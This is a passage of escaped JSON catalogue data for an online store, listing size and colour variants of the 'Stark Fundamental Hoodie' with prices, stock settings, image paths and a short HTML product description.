below\":null,\"use_config_notify_stock_qty\":\"1\",\"manage_stock\":\"0\",\"use_config_manage_stock\":\"1\",\"use_config_qty_increments\":\"1\",\"qty_increments\":\"0\",\"use_config_enable_qty_inc\":\"1\",\"enable_qty_increments\":\"0\",\"is_decimal_divided\":\"0\",\"website_id\":\"1\",\"configurable_variations\":null,\"configurable_variation_prices\":null,\"configurable_variation_labels\":null,\"additional_images\":\"\\/m\\/h\\/mh06-blue_alt1.jpg,\\/m\\/h\\/mh06-blue_back.jpg\",\"image\":\"\\/m\\/h\\/mh06-blue_main.jpg\",\"image_label\":null,\"thumbnail\":\"\\/m\\/h\\/mh06-blue_main.jpg\",\"thumbnail_label\":null,\"_media_image\":\"\\/m\\/h\\/mh06-blue_alt1.jpg,\\/m\\/h\\/mh06-blue_back.jpg\",\"_store\":null,\"_attribute_set\":\"Top\",\"_product_websites\":\"base\",\"status\":\"1\",\"news_from_date\":null,\"news_to_date\":null,\"options_container\":null,\"minimal_price\":null,\"msrp\":null,\"msrp_enabled\":null,\"special_from_date\":null,\"special_to_date\":null,\"min_qty\":\"0\",\"backorders\":\"0\",\"min_sale_qty\":\"1\",\"max_sale_qty\":\"0\",\"notify_stock_qty\":null,\"meta_keyword\":null,\"has_options\":\"0\",\"required_options\":\"0\",\"size\":\"XS\",\"color\":\"Blue\"},{\"sku\":\"MH06-XS-Purple\",\"store_view_code\":null,\"attribute_set_code\":\"Top\",\"product_type\":\"simple\",\"categories\":\"Default Category\\/Men\\/Tops\\/Hoodies & Sweatshirts\",\"product_websites\":\"base\",\"name\":\"Stark Fundamental Hoodie-XS-Purple\",\"description\":\"<p>You don\'t need bells and whistles when performance speaks for itself. The full-zip Stark Fundamental Hoodie give just what you need. Hood and fleece lining keep you warm, while breathable fabric and wicking technology won\'t let you overheat.<\\/p>\\n<p>&bull; Navy specked full zip hoodie.<br \\/>&bull; Ribbed cuffs, banded waist.<br \\/>&bull; Side pockets. <br \\/>&bull; Machine wash\\/dry.<\\/p>\",\"short_description\":null,\"weight\":\"1\",\"product_online\":\"1\",\"tax_class_name\":\"Taxable Goods\",\"visibility\":\"Not Visible Individually\",\"price\":\"42\",\"special_price\":null,\"special_price_from_date\":null,\"special_price_to_date\":null,\"url_key\":\"stark-fundamental-hoodie-xs-purple\",\"meta_title\":null,\"meta_keywords\":null,\"meta_description\":null,\"base_image\":\"\\/m\\/h\\/mh06-purple_main.jpg\",\"base_image_label\":null,\"small_image\":\"\\/m\\/h\\/mh06-purple_main.jpg\",\"small_image_label\":null,\"thumbnail_image\":\"\\/m\\/h\\/mh06-purple_main.jpg\",\"thumbnail_image_label\":null,\"created_at\":null,\"updated_at\":null,\"new_from_date\":null,\"new_to_date\":null,\"display_product_options_in\":null,\"map_price\":null,\"msrp_price\":null,\"map_enabled\":null,\"gift_message_available\":null,\"custom_design\":null,\"custom_design_from\":null,\"custom_design_to\":null,\"custom_layout_update\":null,\"page_layout\":null,\"product_options_container\":null,\"msrp_display_actual_price_type\":null,\"country_of_manufacture\":null,\"additional_attributes\":\"has_options=0,required_options=0,size=XS,color=Purple\",\"qty\":\"100\",\"out_of_stock_qty\":\"0\",\"use_config_min_qty\":\"1\",\"is_qty_decimal\":\"0\",\"allow_backorders\":\"0\",\"use_config_backorders\":\"1\",\"min_cart_qty\":\"1\",\"use_config_min_sale_qty\":\"1\",\"max_cart_qty\":\"0\",\"use_config_max_sale_qty\":\"1\",\"is_in_stock\":\"1\",\"notify_on_stock_below\":null,\"use_config_notify_stock_qty\":\"1\",\"manage_stock\":\"0\",\"use_config_manage_stock\":\"1\",\"use_config_qty_increments\":\"1\",\"qty_increments\":\"0\",\"use_config_enable_qty_inc\":\"1\",\"enable_qty_increments\":\"0\",\"is_decimal_divided\":\"0\",\"website_id\":\"1\",\"configurable_variations\":null,\"configurable_variation_prices\":null,\"configurable_variation_labels\":null,\"additional_images\":null,\"image\":\"\\/m\\/h\\/mh06-purple_main.jpg\",\"image_label\":null,\"thumbnail\":\"\\/m\\/h\\/mh06-purple_main.jpg\",\"thumbnail_label\":null,\"_media_image\":null,\"_store\":null,\"_attribute_set\":\"Top\",\"_product_websites\":\"base\",\"status\":\"1\",\"news_from_date\":null,\"news_to_date\":null,\"options_container\":null,\"minimal_price\":null,\"msrp\":null,\"msrp_enabled\":null,\"special_from_date\":null,\"special_to_date\":null,\"min_qty\":\"0\",\"backorders\":\"0\",\"min_sale_qty\":\"1\",\"max_sale_qty\":\"0\",\"notify_stock_qty\":null,\"meta_keyword\":null,\"has_options\":\"0\",\"required_options\":\"0\",\"size\":\"XS\",\"color\":\"Purple\"},{\"sku\":\"MH06-S-Black\",\"store_view_code\":null,\"attribute_set_code\":\"Top\",\"product_type\":\"simple\",\"categories\":\"Default Category\\/Men\\/Tops\\/Hoodies & Sweatshirts\",\"product_websites\":\"base\",\"name\":\"Stark Fundamental Hoodie-S-Black\",\"description\":\"<p>You don\'t need bells and whistles when performance speaks for itself. The full-zip Stark Fundamental Hoodie give just what you need. Hood and fleece lining keep you warm, while breathable fabric and wicking technology won\'t let you overheat.<\\/p>\\n<p>&bull; Navy specked full zip hoodie.<br \\/>&bull; Ribbed cuffs, banded waist.<br \\/>&bull; Side pockets. <br \\/>&bull; Machine wash\\/dry.<\\/p>\",\"short_description\":null,\"weight\":\"1\",\"product_online\":\"1\",\"tax_class_name\":\"Taxable Goods\",\"visibility\":\"Not Visible Individually\",\"price\":\"42\",\"special_price\":null,\"special_price_from_date\":null,\"special_price_to_date\":null,\"url_key\":\"stark-fundamental-hoodie-s-black\",\"meta_title\":null,\"meta_keywords\":null,\"meta_description\":null,\"base_image\":\"\\/m\\/h\\/mh06-black_main.jpg\",\"base_image_label\":null,\"small_image\":\"\\/m\\/h\\/mh06-black_main.jpg\",\"small_image_label\":null,\"thumbnail_image\":\"\\/m\\/h\\/mh06-black_main.jpg\",\"thumbnail_image_label\":null,\"created_at\":null,\"updated_at\":null,\"new_from_date\":null,\"new_to_date\":null,\"display_product_options_in\":null,\"map_price\":null,\"msrp_price\":null,\"map_enabled\":null,\"gift_message_available\":null,\"custom_design\":null,\"custom_design_from\":null,\"custom_design_to\":null,\"custom_layout_update\":null,\"page_layout\":null,\"product_options_container\":null,\"msrp_display_actual_price_type\":null,\"country_of_manufacture\":null,\"additional_attributes\":\"has_options=0,required_options=0,size=S,color=Black\",\"qty\":\"100\",\"out_of_stock_qty\":\"0\",\"use_config_min_qty\":\"1\",\"is_qty_decimal\":\"0\",\"allow_backorders\":\"0\",\"use_config_backorders\":\"1\",\"min_cart_qty\":\"1\",\"use_config_min_sale_qty\":\"1\",\"max_cart_qty\":\"0\",\"use_config_max_sale_qty\":\"1\",\"is_in_stock\":\"1\",\"notify_on_stock_below\":null,\"use_config_notify_stock_qty\":\"1\",\"manage_stock\":\"0\",\"use_config_manage_stock\":\"1\",\"use_config_qty_increments\":\"1\",\"qty_increments\":\"0\",\"use_config_enable_qty_inc\":\"1\",\"enable_qty_increments\":\"0\",\"is_decimal_divided\":\"0\",\"website_id\":\"1\",\"configurable_variations\":null,\"configurable_variation_prices\":null,\"configurable_variation_labels\":null,\"additional_images\":null,\"image\":\"\\/m\\/h\\/mh06-black_main.jpg\",\"image_label\":null,\"thumbnail\":\"\\/m\\/h\\/mh06-black_main.jpg\",\"thumbnail_label\":null,\"_media_image\":null,\"_store\":null,\"_attribute_set\":\"Top\",\"_product_websites\":\"base\",\"status\":\"1\",\"news_from_date\":null,\"news_to_date\":null,\"options_container\":null,\"minimal_price\":null,\"msrp\":null,\"msrp_enabled\":null,\"special_from_date\":null,\"special_to_date\":null,\"min_qty\":\"0\",\"backorders\":\"0\",\"min_sale_qty\":\"1\",\"max_sale_qty\":\"0\",\"notify_stock_qty\":null,\"meta_keyword\":null,\"has_options\":\"0\",\"required_options\":\"0\",\"size\":\"S\",\"color\":\"Black\"},{\"sku\":\"MH06-S-Blue\",\"store_view_code\":null,\"attribute_set_code\":\"Top\",\"product_type\":\"simple\",\"categories\":\"Default Category\\/Men\\/Tops\\/Hoodies & Sweatshirts\",\"product_websites\":\"base\",\"name\":\"Stark Fundamental Hoodie-S-Blue\",\"description\":\"<p>You don\'t need bells and whistles when performance speaks for itself. The full-zip Stark Fundamental Hoodie give just what you need. Hood and fleece lining keep you warm, while breathable fabric and wicking technology won\'t let you overheat.<\\/p>\\n<p>&bull; Navy specked full zip hoodie.<br \\/>&bull; Ribbed cuffs, banded waist.<br \\/>&bull; Side pockets. <br \\/>&bull; Machine wash\\/dry.<\\/p>\",\"short_description\":null,\"weight\":\"1\",\"product_online\":\"1\",\"tax_class_name\":\"Taxable Goods\",\"visibility\":\"Not Visible Individually\",\"price\":\"42\",\"special_price\":null,\"special_price_from_date\":null,\"special_price_to_date\":null,\"url_key\":\"stark-fundamental-hoodie-s-blue\",\"meta_title\":null,\"meta_keywords\":null,\"meta_description\":null,\"base_image\":\"\\/m\\/h\\/mh06-blue_main.jpg\",\"base_image_label\":null,\"small_image\":\"\\/m\\/h\\/mh06-blue_main.jpg\",\"small_image_label\":null,\"thumbnail_image\":\"\\/m\\/h\\/mh06-blue_main.jpg\",\"thumbnail_image_label\":null,\"created_at\":null,\"updated_at\":null,\"new_from_date\":null,\"new_to_date\":null,\"display_product_options_in\":null,\"map_price\":null,\"msrp_price\":null,\"map_enabled\":null,\"gift_message_available\":null,\"custom_design\":null,\"custom_design_from\":null,\"custom_design_to\":null,\"custom_layout_update\":null,\"page_layout\":null,\"product_options_container\":null,\"msrp_display_actual_price_type\":null,\"country_of_manufacture\":null,\"additional_attributes\":\"has_options=0,required_options=0,size=S,color=Blue\",\"qty\":\"100\",\"out_of_stock_qty\":\"0\",\"use_config_min_qty\":\"1\",\"is_qty_decimal\":\"0\",\"allow_backorders\":\"0\",\"use_config_backorders\":\"1\",\"min_cart_qty\":\"1\",\"use_config_min_sale_qty\":\"1\",\"max_cart_qty\":\"0\",\"use_config_max_sale_qty\":\"1\",\"is_in_stock\":\"1\",\"notify_on_stock_below\":null,\"use_config_notify_stock_qty\":\"1\",\"manage_stock\":\"0\",\"use_config_manage_stock\":\"1\",\"use_config_qty_increments\":\"1\",\"qty_increments\":\"0\",\"use_config_enable_qty_inc\":\"1\",\"enable_qty_increments\":\"0\",\"is_decimal_divided\":\"0\",\"website_id\":\"1\",\"configurable_variations\":null,\"configurable_variation_prices\":null,\"configurable_variation_labels\":null,\"additional_images\":\"\\/m\\/h\\/mh06-blue_alt1.jpg,\\/m\\/h\\/mh06-blue_back.jpg\",\"image\":\"\\/m\\/h\\/mh06-blue_main.jpg\",\"image_label\":null,\"thumbnail\":\"\\/m\\/h\\/mh06-blue_main.jpg\",\"thumbnail_label\":null,\"_media_image\":\"\\/m\\/h\\/mh06-blue_alt1.jpg,\\/m\\/h\\/mh06-blue_back.jpg\",\"_store\":null,\"_attribute_set\":\"Top\",\"_product_websites\":\"base\",\"status\":\"1\",\"news_from_date\":null,\"news_to_date\":null,\"options_container\":null,\"minimal_price\":null,\"msrp\":null,\"msrp_enabled\":null,\"special_from_date\":null,\"special_to_date\":null,\"min_qty\":\"0\",\"backorders\":\"0\",\"min_sale_qty\":\"1\",\"max_sale_qty\":\"0\",\"notify_stock_qty\":null,\"meta_keyword\":null,\"has_options\":\"0\",\"required_options\":\"0\",\"size\":\"S\",\"color\":\"Blue\"},{\"sku\":\"MH06-S-Purple\",\"store_view_code\":null,\"attribute_set_code\":\"Top\",\"product_type\":\"simple\",\"categories\":\"Default Category\\/Men\\/Tops\\/Hoodies & Sweatshirts\",\"product_websites\":\"base\",\"name\":\"Stark Fundamental Hoodie-S-Purple\",\"description\":\"<p>You don\'t need bells and whistles when performance speaks for itself. The full-zip Stark Fundamental Hoodie give just what you need. Hood and fleece lining keep you warm, while breathable fabric and wicking technology won\'t let you overheat.<\\/p>\\n<p>&bull; Navy specked full zip hoodie.<br \\/>&bull; Ribbed cuffs, banded waist.<br \\/>&bull; Side pockets. <br \\/>&bull; Machine wash\\/dry.<\\/p>\",\"short_description\":null,\"weight\":\"1\",\"product_online\":\"1\",\"tax_class_name\":\"Taxable Goods\",\"visibility\":\"Not Visible Individually\",\"price\":\"42\",\"special_price\":null,\"special_price_from_date\":null,\"special_price_to_date\":null,\"url_key\":\"stark-fundamental-hoodie-s-purple\",\"meta_title\":null,\"meta_keywords\":null,\"meta_description\":null,\"base_image\":\"\\/m\\/h\\/mh06-purple_main.jpg\",\"base_image_label\":null,\"small_image\":\"\\/m\\/h\\/mh06-purple_main.jpg\",\"small_image_label\":null,\"thumbnail_image\":\"\\/m\\/h\\/mh06-purple_main.jpg\",\"thumbnail_image_label\":null,\"created_at\":null,\"updated_at\":null,\"new_from_date\":null,\"new_to_date\":null,\"display_product_options_in\":null,\"map_price\":null,\"msrp_price\":null,\"map_enabled\":null,\"gift_message_available\":null,\"custom_design\":null,\"custom_design_from\":null,\"custom_design_to\":null,\"custom_layout_update\":null,\"page_layout\":null,\"product_options_container\":null,\"msrp_display_actual_price_type\":null,\"country_of_manufacture\":null,\"additional_attributes\":\"has_options=0,required_options=0,size=S,color=Purple\",\"qty\":\"100\",\"out_of_stock_qty\":\"0\",\"use_config_min_qty\":\"1\",\"is_qty_decimal\":\"0\",\"allow_backorders\":\"0\",\"use_config_backorders\":\"1\",\"min_cart_qty\":\"1\",\"use_config_min_sale_qty\":\"1\",\"max_cart_qty\":\"0\",\"use_config_max_sale_qty\":\"1\",\"is_in_stock\":\"1\",\"notify_on_stock_below\":null,\"use_config_notify_stock_qty\":\"1\",\"manage_stock\":\"0\",\"use_config_manage_stock\":\"1\",\"use_config_qty_increments\":\"1\",\"qty_increments\":\"0\",\"use_config_enable_qty_inc\":\"1\",\"enable_qty_increments\":\"0\",\"is_decimal_divided\":\"0\",\"website_id\":\"1\",\"configurable_variations\":null,\"configurable_variation_prices\":null,\"configurable_variation_labels\":null,\"additional_images\":null,\"image\":\"\\/m\\/h\\/mh06-purple_main.jpg\",\"image_label\":null,\"thumbnail\":\"\\/m\\/h\\/mh06-purple_main.jpg\",\"thumbnail_label\":null,\"_media_image\":null,\"_store\":null,\"_attribute_set\":\"Top\",\"_product_websites\":\"base\",\"status\":\"1\",\"news_from_date\":null,\"news_to_date\":null,\"options_container\":null,\"minimal_price\":null,\"msrp\":null,\"msrp_enabled\":null,\"special_from_date\":null,\"special_to_date\":null,\"min_qty\":\"0\",\"backorders\":\"0\",\"min_sale_qty\":\"1\",\"max_sale_qty\":\"0\",\"notify_stock_qty\":null,\"meta_keyword\":null,\"has_options\":\"0\",\"required_options\":\"0\",\"size\":\"S\",\"color\":\"Purple\"},{\"sku\":\"MH06-M-Black\",\"store_view_code\":null,\"attribute_set_code\":\"Top\",\"product_type\":\"simple\",\"categories\":\"Default Category\\/Men\\/Tops\\/Hoodies & Sweatshirts\",\"product_websites\":\"base\",\"name\":\"Stark Fundamental Hoodie-M-Black\",\"description\":\"<p>You don\'t need bells and whistles when performance speaks for itself. The full-zip Stark Fundamental Hoodie give just what you need. Hood and fleece lining keep you warm, while breathable fabric and wicking technology won\'t let you overheat.<\\/p>\\n<p>&bull; Navy specked full zip hoodie.<br \\/>&bull; Ribbed cuffs, banded waist.<br \\/>&bull; Side pockets. <br \\/>&bull; Machine wash\\/dry.<\\/p>\",\"short_description\":null,\"weight\":\"1\",\"product_online\":\"1\",\"tax_class_name\":\"Taxable Goods\",\"visibility\":\"Not Visible Individually\",\"price\":\"42\",\"special_price\":null,\"special_price_from_date\":null,\"special_price_to_date\":null,\"url_key\":\"stark-fundamental-hoodie-m-black\",\"meta_title\":null,\"meta_keywords\":null,\"meta_description\":null,\"base_image\":\"\\/m\\/h\\/mh06-black_main.jpg\",\"base_image_label\":null,\"small_image\":\"\\/m\\/h\\/mh06-black_main.jpg\",\"small_image_label\":null,\"thumbnail_image\":\"\\/m\\/h\\/mh06-black_main.jpg\",\"thumbnail_image_label\":null,\"created_at\":null,\"updated_at\":null,\"new_from_date\":null,\"new_to_date\":null,\"display_product_options_in\":null,\"map_price\":null,\"msrp_price\":null,\"map_enabled\":null,\"gift_message_available\":null,\"custom_design\":null,\"custom_design_from\":null,\"custom_design_to\":null,\"custom_layout_update\":null,\"page_layout\":null,\"product_options_container\":null,\"msrp_display_actual_price_type\":null,\"country_of_manufacture\":null,\"additional_attributes\":\"has_options=0,required_options=0,size=M,color=Black\",\"qty\":\"100\",\"out_of_stock_qty\":\"0\",\"use_config_min_qty\":\"1\",\"is_qty_decimal\":\"0\",\"allow_backorders\":\"0\",\"use_config_backorders\":\"1\",\"min_cart_qty\":\"1\",\"use_config_min_sale_qty\":\"1\",\"max_cart_qty\":\"0\",\"use_config_max_sale_qty\":\"1\",\"is_in_stock\":\"1\",\"notify_on_stock_below\":null,\"use_config_notify_stock_qty\":\"1\",\"manage_stock\":\"0\",\"use_config_manage_stock\":\"1\",\"use_config_qty_increments\":\"1\",\"qty_increments\":\"0\",\"use_config_enable_qty_inc\":\"1\",\"enable_qty_increments\":\"0\",\"is_decimal_divided\":\"0\",\"website_id\":\"1\",\"configurable_variations\":null,\"configurable_variation_prices\":null,\"configurable_variation_labels\":null,\"additional_images\":null,\"image\":\"\\/m\\/h\\/mh06-black_main.jpg\",\"image_label\":null,\"thumbnail\":\"\\/m\\/h\\/mh06-black_main.jpg\",\"thumbnail_label\":null,\"_media_image\":null,\"_store\":null,\"_attribute_set\":\"Top\",\"_product_websites\":\"base\",\"status\":\"1\",\"news_from_date\":null,\"news_to_date\":null,\"options_container\":null,\"minimal_price\":null,\"msrp\":null,\"msrp_enabled\":null,\"special_from_date\":null,\"special_to_date\":null,\"min_qty\":\"0\",\"backorders\":\"0\",\"min_sale_qty\":\"1\",\"max_sale_qty\":\"0\",\"notify_stock_qty\":null,\"meta_keyword\":null,\"has_options\":\"0\",\"required_options\":\"0\",\"size\":\"M\",\"color\":\"Black\"},{\"sku\":\"MH06-M-Blue\",\"store_view_code\":null,\"attribute_set_code\":\"Top\",\"product_type\":\"simple\",\"categories\":\"Default Category\\/Men\\/Tops\\/Hoodies & Sweatshirts\",\"product_websites\":\"base\",\"name\":\"Stark Fundamental Hoodie-M-Blue\",\"description\":\"<p>You don\'t need bells and whistles when performance speaks for itself. The full-zip Stark Fundamental Hoodie give just what you need. Hood and fleece lining keep you warm, while breathable fabric and wicking technology won\'t let you overheat.<\\/p>\\n<p>&bull; Navy specked full zip hoodie.<br \\/>&bull; Ribbed cuffs, banded waist.<br \\/>&bull; Side pockets. <br \\/>&bull; Machine wash\\/dry.<\\/p>\",\"short_description\":null,\"weight\":\"1\",\"product_online\":\"1\",\"tax_class_name\":\"Taxable Goods\",\"visibility\":\"Not Visible Individually\",\"price\":\"42\",\"special_price\":null,\"special_price_from_date\":null,\"special_price_to_date\":null,\"url_key\":\"stark-fundamental-hoodie-m-blue\",\"meta_title\":null,\"meta_keywords\":null,\"meta_description\":null,\"base_image\":\"\\/m\\/h\\/mh06-blue_main.jpg\",\"base_image_label\":null,\"small_image\":\"\\/m\\/h\\/mh06-blue_main.jpg\",\"small_image_label\":null,\"thumbnail_image\":\"\\/m\\/h\\/mh06-blue_main.jpg\",\"thumbnail_image_label\":null,\"created_at\":null,\"updated_at\":null,\"new_from_date\":null,\"new_to_date\":null,\"display_product_options_in\":null,\"map_price\":null,\"msrp_price\":null,\"map_enabled\":null,\"gift_message_available\":null,\"custom_design\":null,\"custom_design_from\":null,\"custom_design_to\":null,\"custom_layout_update\":null,\"page_layout\":null,\"product_options_container\":null,\"msrp_display_actual_price_type\":null,\"country_of_manufacture\":null,\"additional_attributes\":\"has_options=0,required_options=0,size=M,color=Blue\",\"qty\":\"100\",\"out_of_stock_qty\":\"0\",\"use_config_min_qty\":\"1\",\"is_qty_decimal\":\"0\",\"allow_backorders\":\"0\",\"use_config_backorders\":\"1\",\"min_cart_qty\":\"1\",\"use_config_min_sale_qty\":\"1\",\"max_cart_qty\":\"0\",\"use_config_max_sale_qty\":\"1\",\"is_in_stock\":\"1\",\"notify_on_stock_below\":null,\"use_config_notify_stock_qty\":\"1\",\"manage_stock\":\"0\",\"use_config_manage_stock\":\"1\",\"use_config_qty_increments\":\"1\",\"qty_increments\":\"0\",\"use_config_enable_qty_inc\":\"1\",\"enable_qty_increments\":\"0\",\"is_decimal_divided\":\"0\",\"website_id\":\"1\",\"configurable_variations\":null,\"configurable_variation_prices\":null,\"configurable_variation_labels\":null,\"additional_images\":\"\\/m\\/h\\/mh06-blue_alt1.jpg,\\/m\\/h\\/mh06-blue_back.jpg\",\"image\":\"\\/m\\/h\\/mh06-blue_main.jpg\",\"image_label\":null,\"thumbnail\":\"\\/m\\/h\\/mh06-blue_main.jpg\",\"thumbnail_label\":null,\"_media_image\":\"\\/m\\/h\\/mh06-blue_alt1.jpg,\\/m\\/h\\/mh06-blue_back.jpg\",\"_store\":null,\"_attribute_set\":\"Top\",\"_product_websites\":\"base\",\"status\":\"1\",\"news_from_date\":null,\"news_to_date\":null,\"options_container\":null,\"minimal_price\":null,\"msrp\":null,\"msrp_enabled\":null,\"special_from_date\":null,\"special_to_date\":null,\"min_qty\":\"0\",\"backorders\":\"0\",\"min_sale_qty\":\"1\",\"max_sale_qty\":\"0\",\"notify_stock_qty\":null,\"meta_keyword\":null,\"has_options\":\"0\",\"required_options\":\"0\",\"size\":\"M\",\"color\":\"Blue\"},{\"sku\":\"MH06-M-Purple\",\"store_view_code\":null,\"attribute_set_code\":\"Top\",\"product_type\":\"simple\",\"categories\":\"Default Category\\/Men\\/Tops\\/Hoodies & Sweatshirts\",\"product_websites\":\"base\",\"name\":\"Stark Fundamental Hoodie-M-Purple\",\"description\":\"<p>You don\'t need bells and whistles when performance speaks for itself. The full-zip Stark Fundamental Hoodie give just what you need. Hood and fleece lining keep you warm, while breathable fabric and wicking technology won\'t let you overheat.<\\/p>\\n<p>&bull; Navy specked full zip hoodie.<br \\/>&bull; Ribbed cuffs, banded waist.<br \\/>&bull; Side pockets. <br \\/>&bull; Machine wash\\/dry.<\\/p>\",\"short_description\":null,\"weight\":\"1\",\"product_online\":\"1\",\"tax_class_name\":\"Taxable Goods\",\"visibility\":\"Not Visible Individually\",\"price\":\"42\",\"special_price\":null,\"special_price_from_date\":null,\"special_price_to_date\":null,\"url_key\":\"stark-fundamental-hoodie-m-purple\",\"meta_title\":null,\"meta_keywords\":null,\"meta_description\":null,\"base_image\":\"\\/m\\/h\\/mh06-purple_main.jpg\",\"base_image_label\":null,\"small_image\":\"\\/m\\/h\\/mh06-purple_main.jpg\",\"small_image_label\":null,\"thumbnail_image\":\"\\/m\\/h\\/mh06-purple_main.jpg\",\"thumbnail_image_label\":null,\"created_at\":null,\"updated_at\":null,\"new_from_date\":null,\"new_to_date\":null,\"display_product_options_in\":null,\"map_price\":null,\"msrp_price\":null,\"map_enabled\":null,\"gift_message_available\":null,\"custom_design\":null,\"custom_design_from\":null,\"custom_design_to\":null,\"custom_layout_update\":null,\"page_layout\":null,\"product_options_container\":null,\"msrp_display_actual_price_type\":null,\"country_of_manufacture\":null,\"additional_attributes\":\"has_options=0,required_options=0,size=M,color=Purple\",\"qty\":\"100\",\"out_of_stock_qty\":\"0\",\"use_config_min_qty\":\"1\",\"is_qty_decimal\":\"0\",\"allow_backorders\":\"0\",\"use_config_backorders\":\"1\",\"min_cart_qty\":\"1\",\"use_config_min_sale_qty\":\"1\",\"max_cart_qty\":\"0\",\"use_config_max_sale_qty\":\"1\",\"is_in_stock\":\"1\",\"notify_on_stock_below\":null,\"use_config_notify_stock_qty\":\"1\",\"manage_stock\":\"0\",\"use_config_manage_stock\":\"1\",\"use_config_qty_increments\":\"1\",\"qty_increments\":\"0\",\"use_config_enable_qty_inc\":\"1\",\"enable_qty_increments\":\"0\",\"is_decimal_divided\":\"0\",\"website_id\":\"1\",\"configurable_variations\":null,\"configurable_variation_prices\":null,\"configurable_variation_labels\":null,\"additional_images\":null,\"image\":\"\\/m\\/h\\/mh06-purple_main.jpg\",\"image_label\":null,\"thumbnail\":\"\\/m\\/h\\/mh06-purple_main.jpg\",\"thumbnail_label\":null,\"_media_image\":null,\"_store\":null,\"_attribute_set\":\"Top\",\"_product_websites\":\"base\",\"status\":\"1\",\"news_from_date\":null,\"news_to_date\":null,\"options_container\":null,\"minimal_price\":null,\"msrp\":null,\"msrp_enabled\":null,\"special_from_date\":null,\"special_to_date\":null,\"min_qty\":\"0\",\"backorders\":\"0\",\"min_sale_qty\":\"1\",\"max_sale_qty\":\"0\",\"notify_stock_qty\":null,\"meta_keyword\":null,\"has_options\":\"0\",\"required_options\":\"0\",\"size\":\"M\",\"color\":\"Purple\"},{\"sku\":\"MH06-L-Black\",\"store_view_code\":null,\"attribute_set_code\":\"Top\",\"product_type\":\"simple\",\"categories\":\"Default Category\\/Men\\/Tops\\/Hoodies & Sweatshirts\",\"product_websites\":\"base\",\"name\":\"Stark Fundamental Hoodie-L-Black\",\"description\":\"<p>You don\'t need bells and whistles when performance speaks for itself. The full-zip Stark Fundamental Hoodie give just what you need. Hood and fleece lining keep you warm, while breathable fabric and wicking technology won\'t let you overheat.<\\/p>\\n<p>&bull; Navy specked full zip hoodie.<br \\/>&bull; Ribbed cuffs, banded waist.<br \\/>&bull; Side pockets. <br \\/>&bull; Machine wash\\/dry.<\\/p>\",\"short_description\":null,\"weight\":\"1\",\"product_online\":\"1\",\"tax_class_name\":\"Taxable Goods\",\"visibility\":\"Not Visible Individually\",\"price\":\"42\",\"special_price\":null,\"special_price_from_date\":null,\"special_price_to_date\":null,\"url_key\":\"stark-fundamental-hoodie-l-black\",\"meta_title\":null,\"meta_keywords\":null,\"meta_description\":null,\"base_image\":\"\\/m\\/h\\/mh06-black_main.jpg\",\"base_image_label\":null,\"small_image\":\"\\/m\\/h\\/mh06-black_main.jpg\",\"small_image_label\":null,\"thumbnail_image\":\"\\/m\\/h\\/mh06-black_main.jpg\",\"thumbnail_image_label\":null,\"created_at\":null,\"updated_at\":null,\"new_from_date\":null,\"new_to_date\":null,\"display_product_options_in\":null,\"map_price\":null,\"msrp_price\":null,\"map_enabled\":null,\"gift_message_available\":null,\"custom_design\":null,\"custom_design_from\":null,\"custom_design_to\":null,\"custom_layout_update\":null,\"page_layout\":null,\"product_options_container\":null,\"msrp_display_actual_price_type\":null,\"country_of_manufacture\":null,\"additional_attributes\":\"has_options=0,required_options=0,size=L,color=Black\",\"qty\":\"100\",\"out_of_stock_qty\":\"0\",\"use_config_min_qty\":\"1\",\"is_qty_decimal\":\"0\",\"allow_backorders\":\"0\",\"use_config_backorders\":\"1\",\"min_cart_qty\":\"1\",\"use_config_min_sale_qty\":\"1\",\"max_cart_qty\":\"0\",\"use_config_max_sale_qty\":\"1\",\"is_in_stock\":\"1\",\"notify_on_stock_below\":null,\"use_config_notify_stock_qty\":\"1\",\"manage_stock\":\"0\",\"use_config_manage_stock\":\"1\",\"use_config_qty_increments\":\"1\",\"qty_increments\":\"0\",\"use_config_enable_qty_inc\":\"1\",\"enable_qty_increments\":\"0\",\"is_decimal_divided\":\"0\",\"website_id\":\"1\",\"configurable_variations\":null,\"configurable_variation_prices\":null,\"configurable_variation_labels\":null,\"additional_images\":null,\"image\":\"\\/m\\/h\\/mh06-black_main.jpg\",\"image_label\":null,\"thumbnail\":\"\\/m\\/h\\/mh06-black_main.jpg\",\"thumbnail_label\":null,\"_media_image\":null,\"_store\":null,\"_attribute_set\":\"Top\",\"_product_websites\":\"base\",\"status\":\"1\",\"news_from_date\":null,\"news_to_date\":null,\"options_container\":null,\"minimal_price\":null,\"msrp\":null,\"msrp_enabled\":null,\"special_from_date\":null,\"special_to_date\":null,\"min_qty\":\"0\",\"backorders\":\"0\",\"min_sale_qty\":\"1\",\"max_sale_qty\":\"0\",\"notify_stock_qty\":null,\"meta_keyword\":null,\"has_options\":\"0\",\"required_options\":\"0\",\"size\":\"L\",\"color\":\"Black\"},{\"sku\":\"MH06-L-Blue\",\"store_view_code\":null,\"attribute_set_code\":\"Top\",\"product_type\":\"simple\",\"categories\":\"Default Category\\/Men\\/Tops\\/Hoodies & Sweatshirts\",\"product_websites\":\"base\",\"name\":\"Stark Fundamental Hoodie-L-Blue\",\"description\":\"<p>You don\'t need bells and whistles when performance speaks for itself. The full-zip Stark Fundamental Hoodie give just what you need. Hood and fleece lining keep you warm, while breathable fabric and wicking technology won\'t let you overheat.<\\/p>\\n<p>&bull; Navy specked full zip hoodie.<br \\/>&bull; Ribbed cuffs, banded waist.<br \\/>&bull; Side pockets. <br \\/>&bull; Machine wash\\/dry.<\\/p>\",\"short_description\":null,\"weight\":\"1\",\"product_online\":\"1\",\"tax_class_name\":\"Taxable Goods\",\"visibility\":\"Not Visible Individually\",\"price\":\"42\",\"special_price\":null,\"special_price_from_date\":null,\"special_price_to_date\":null,\"url_key\":\"stark-fundamental-hoodie-l-blue\",\"meta_title\":null,\"meta_keywords\":null,\"meta_description\":null,\"base_image\":\"\\/m\\/h\\/mh06-blue_main.jpg\",\"base_image_label\":null,\"small_image\":\"\\/m\\/h\\/mh06-blue_main.jpg\",\"small_image_label\":null,\"thumbnail_image\":\"\\/m\\/h\\/mh06-blue_main.jpg\",\"thumbnail_image_label\":null,\"created_at\":null,\"updated_at\":null,\"new_from_date\":null,\"new_to_date\":null,\"display_product_options_in\":null,\"map_price\":null,\"msrp_price\":null,\"map_enabled\":null,\"gift_message_available\":null,\"custom_design\":null,\"custom_design_from\":null,\"custom_design_to\":null,\"custom_layout_update\":null,\"page_layout\":null,\"product_options_container\":null,\"msrp_display_actual_price_type\":null,\"country_of_manufacture\":null,\"additional_attributes\":\"has_options=0,required_options=0,size=L,color=Blue\",\"qty\":\"100\",\"out_of_stock_qty\":\"0\",\"use_config_min_qty\":